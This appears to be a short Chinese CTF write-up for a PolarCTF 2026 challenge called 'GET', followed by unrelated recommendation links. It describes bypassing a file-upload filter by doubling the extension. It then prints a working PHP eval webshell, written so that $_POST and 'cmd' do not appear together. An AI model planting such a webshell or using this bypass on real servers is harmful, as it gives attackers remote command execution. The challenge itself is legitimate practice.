【PolarCTF2026年春季挑战赛】GET

大方子2026-03-29 11:17

直接上传一个php试试

文件名后缀双写可以绕过

可以解析,我们上传一句话木马

提示出现了$_POST'cmd'

那么用下面的webshell,避免POST和cmd一起出现

php 复制代码 
<?php $x = $_POST; @eval($x['cmd']); ?>

上传成功,访问一下

得到flag{73121d2832f501293a2e661c4d3a082f}

相关推荐
菩提小狗27 分钟前
每日安全情报报告 · 2026-05-30
网络安全·漏洞·cve·安全情报·每日安全
IPHWT 零软网络9 小时前
MX60E-A信创级智能语音网关技术实现与架构分析
网络·网络安全·国产自研·技术实现·智能语音网关·政企通信·信创技术
сокол17 小时前
【网安-Web渗透测试-免杀系列】内存免杀(无文件落地)
windows·网络安全
学习溢出19 小时前
【网络安全】追踪PowerShell命令历史
安全·网络安全
Sombra_Olivia20 小时前
Vulhub 中的 cmsms CVE-2019-9053 & CVE-2021-26120
安全·web安全·网络安全·渗透测试·vulhub
大方子1 天前
【PolarCTF】bllbl_ser1
网络安全·polarctf
Chengbei111 天前
小程序 AI 渗透新工具MCP!打通调试与安全检测、网络抓包、接口分析、越权检测一站式实现
人工智能·安全·web安全·搜索引擎·网络安全·小程序·系统安全
humors2211 天前
Windows运维与安全场景合集(不定期更新)
大数据·运维·服务器·程序人生·网络安全
X7x51 天前
安全编排自动化与响应(SOAR):重塑企业安全运营的新引擎
网络安全·网络攻击模型·安全威胁分析·安全架构·soar
热门推荐
01GitHub 镜像站点02DeepSeek V4 + Claude Code thinking mode 400 错误修复方案03【AI】2026 年具身智能模型和世界模型总结04Codex 接入 DeepSeek API 完整配置文档05【踩坑记录 | 第一篇】微软商店无法使用时,如何手动安装 OpenAI Codex?附`.msix`文件系统错误解决方法06裂开!ChatGPT 居然开始要手机号验证,附详细解决方法07CC-Switch & Claude 基于 Linux 服务器安装使用指南08几个好用的ip纯净度检测网站09CC-Switch 全平台下载、安装与使用全指南(Windows/macOS/Linux)10API Key 登录 Codex 也能用插件了,还支持会话删除和导出